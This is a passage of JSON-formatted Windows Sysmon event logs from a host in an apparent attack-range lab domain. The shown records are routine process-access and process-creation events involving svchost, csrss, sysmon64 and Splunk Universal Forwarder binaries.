C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010A2710500}\r\nTargetProcessId: 2008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010A2710500}","TargetProcessId":"2008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nProcessGuid: {41C8662E-1FF5-5F25-0000-00105A720500}\r\nProcessId: 4800\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF5-5F25-0000-0010A2710500}\r\nParentProcessId: 2008\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","ProcessGuid":"{41C8662E-1FF5-5F25-0000-00105A720500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF5-5F25-0000-0010A2710500}","ParentProcessId":"2008","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.219\r\nSourceProcessGUID: {41C8662E-1FF5-5F25-0000-0010A2710500}\r\nSourceProcessId: 2008\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00105A720500}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.219","SourceProcessGUID":"{41C8662E-1FF5-5F25-0000-0010A2710500}","SourceProcessId":"2008","SourceThreadId":"4072","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00105A720500}","TargetProcessId":"4800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00105A720500}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00105A720500}","TargetProcessId":"4800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 